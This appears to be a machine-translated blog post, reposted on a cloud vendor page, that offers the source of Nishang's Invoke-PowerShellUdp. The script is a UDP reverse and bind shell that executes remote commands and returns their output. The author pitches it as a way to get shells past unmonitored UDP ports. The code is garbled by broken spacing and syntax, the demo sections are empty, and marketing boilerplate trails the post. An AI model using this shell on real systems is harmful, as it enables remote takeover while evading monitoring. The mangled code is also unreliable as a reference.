One week PowerShell script Day 2: UDP interactive PowerShell script
Welcome to the second day of the week's PowerShell script. Today I will introduce the interactive PowerShell script using UDP. I like UDP, because many security teams and vendors will habitually ignore it. I also found in the customer's environment that UDP ports such as 53,161 or even 389 are not properly filtered or monitored. Let's use UDP to get some shells.
I would like to introduce you to Invoke-PowerShellUdp. It is similar to Invoke-PowerShellTcp in syntax. The following is the source code that does not include the help documentation:
Function Invoke-PowerShellUdp {
[CmdletBinding (defaparameparametersetname = "reverse")] Param (
[Parameter (Position = 0, Mandatory = $ true, ParameterSetName = "reverse")]
[Parameter (Position = 0, Mandatory = $ false, ParameterSetName = "bind")]
[String]
$ IPAddress, [Parameter (Position = 1, Mandatory = $ true, ParameterSetName = "reverse")]
[Parameter (Position = 1, Mandatory = $ true, ParameterSetName = "bind")]
[Int]
$ Port, [Parameter (ParameterSetName = "reverse")]
[Switch]
$ Reverse, [Parameter (ParameterSetName = "bind")]
[Switch]
$ Bind
)
# Connect back if the reverse switch is used.
If ($ Reverse)
{
$ Endpoint = New-Object System. Net. IPEndPoint ([System. Net. IPAddress]: Parse ($ IPAddress), $ Port)
$ Client = New-Object System. Net. Sockets. UDPClient}
# Bind to the provided port if Bind switch is used.
If ($ Bind)
{
$ Endpoint = New-Object System. Net. IPEndPoint ([System. Net. IPAddress]: ANY, $ Port)
$ Client = New-Object System. Net. Sockets. UDPClient ($ Port)
$ Client. Receive ([ref] $ endpoint)
}
[Byte [] $ bytes = 0 .. 255 | % {0}
# Send back current username and computername
$ Sendbytes = ([text. encoding]: ASCII ). getBytes ("Windows PowerShell running as user" + $ env: username + "on" + $ env: computername + "'ncopyright (C) 2015 Microsoft Corporation. all rights reserved. 'N ")
$ Client. Send ($ sendbytes, $ sendbytes. Length, $ endpoint)
# Show an interactive PowerShell prompt
$ Sendbytes = ([text. encoding]: ASCII). GetBytes ('ps' + (Get-Location). Path + '> ')
$ Client. Send ($ sendbytes, $ sendbytes. Length, $ endpoint)
While ($ true)
{
$ Receivebytes = $ client. Receive ([ref] $ endpoint)
$ Returndata = ([text. encoding]: ASCII). GetString ($ receivebytes)
$ Result = (Invoke-Expression-Command $ returndata 2> & 1 | Out-String)
$ Sendback = $ result + 'ps' + (Get-Location). Path + '>'
$ X = ($ error [0] | Out-String)
$ Error. clear ()
$ Sendback2 = $ sendback + $ x
# Send results back
$ Sendbytes = ([text. encoding]: ASCII). GetBytes ($ sendback2)
$ Client. Send ($ sendbytes, $ sendbytes. Length, $ endpoint)
}
$ Client. Close ()}
You can find: https://github.com/samratashok/nishang/tree/master/Shells under the Shells directory of Nishang
The following shows a reverse connection of Invoke-PowerShellUdp:
Use IPv6 UDP reverse connection:
Active connection:
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
